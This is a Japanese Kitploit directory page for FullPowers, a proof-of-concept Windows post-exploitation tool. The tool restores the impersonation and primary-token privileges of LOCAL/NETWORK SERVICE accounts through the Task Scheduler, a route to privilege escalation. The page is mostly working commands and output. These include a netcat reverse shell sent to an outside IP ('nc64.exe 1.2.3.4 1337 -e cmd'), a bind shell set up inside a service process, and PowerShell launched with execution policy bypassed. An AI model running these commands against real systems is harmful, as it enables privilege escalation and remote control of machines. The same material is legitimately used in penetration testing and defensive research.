Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
FullPowers — LOCAL/NETWORK SERVICE アカウントのデフォルトの特権セットを回復する | Kitploit
ツール/GitHubGitHub/itm4n/fullpowers
特権昇格エクスプロイトポストエクスプロイトペネトレーションテストレッドチーミングArchived
GitHubitm4n/fullpowers

FullPowers

LOCAL/NETWORK SERVICE アカウントのデフォルトの特権セットを回復する

リポジトリを見る
7001026年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

FullPowers

FullPowers は、サービスアカウントの デフォルト特権セット(SeAssignPrimaryToken や SeImpersonate を含む)を自動的に回復するために私が作成した Proof-of-Concept ツールです。

理論的根拠

Windows では、LOCAL SERVICE または NETWORK SERVICE として実行される一部のサービスは、制限された特権セット で実行するように構成されています。そのため、サービスが侵害されても、黄金の偽装特権 は得られず、LOCAL SYSTEM への特権昇格はより複雑になるはずです。しかし、スケジュールタスクを作成 すると、タスクスケジューラサービス によって作成された新しいプロセスには、関連するユーザーアカウントの すべてのデフォルト特権(SeImpersonate を除く)が与えられることがわかりました。したがって、いくつかのトークン操作により、不足しているすべての特権を持つ新しいプロセスを生成できます。

For more information: https://itm4n.github.io/localservice-privileges/

使用法

⚠️ このツールは LOCAL SERVICE または NETWORK SERVICE としてのみ実行してください。

-h オプションを使用してヘルプメッセージを確認できます。

root@kitploit:~
c:\TOOLS>FullPowers -h

FullPowers v0.1 (by @itm4n)

  This tool leverages the Task Scheduler to recover the default privilege set of a service account.
  For more information: https://itm4n.github.io/localservice-privileges/

Optional arguments:
  -v              Verbose mode, used for debugging essentially
  -c <CMD>        Custom command line to execute (default is 'C:\Windows\System32\cmd.exe')
  -x              Try to get the extended set of privileges (might fail with NETWORK SERVICE)
  -z              Non-interactive, create a new process and exit (default is 'interact with the new process')

例1、基本的な使用法

root@kitploit:~
c:\TOOLS>FullPowers
[+] Successfully created scheduled task. PID=9976
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>

例2、カスタムコマンドラインを指定する

root@kitploit:~
c:\TOOLS>FullPowers -c "powershell -ep Bypass"
[+] Successfully created scheduled task. PID=9028
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\WINDOWS\system32> Get-ExecutionPolicy
Bypass

例3、netcat リバースシェルを起動して終了

root@kitploit:~
c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
[+] Successfully created scheduled task. PID=5482
[+] CreateProcessAsUser() OK

使い方

この PoC を自分でテストしてみたいですか?それは素晴らしい! 始めるための簡単な手順を以下に示します。

全体的なアイデアは、既存のサービスのプロセスからバインドシェルを起動し、それに接続してから実行可能ファイルを実行することです。

  1. 2つのサードパーティ製ツール、netcat と RunFromProcess が必要です。
  2. 制限された特権を持つサービスを選択します。例:upnphost。
  3. タスクマネージャー を開き、サービス タブに移動して、対応するプロセスの PID を取得します。
  4. 次のコマンドを使用して、管理者として バインドシェルを起動します。
root@kitploit:~
C:\TOOLS>RunFromProcess-x64.exe <PID> C:\TOOLS\nc64.exe -l -p 9001 -e cmd
  1. 次のコマンドを使用してバインドシェルに接続します。
root@kitploit:~
C:\TOOLS>nc64.exe 127.0.0.1 9001
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description              State
======================= ======================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects    Enabled
  1. 現在のプロセスには偽装特権がないことがわかります。次に PoC を実行します...
root@kitploit:~
c:\TOOLS>FullPowers
[+] Started dummy thread with id 5568
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

これで 偽装特権 を持つシェルが手に入るはずです!

ツールをダウンロード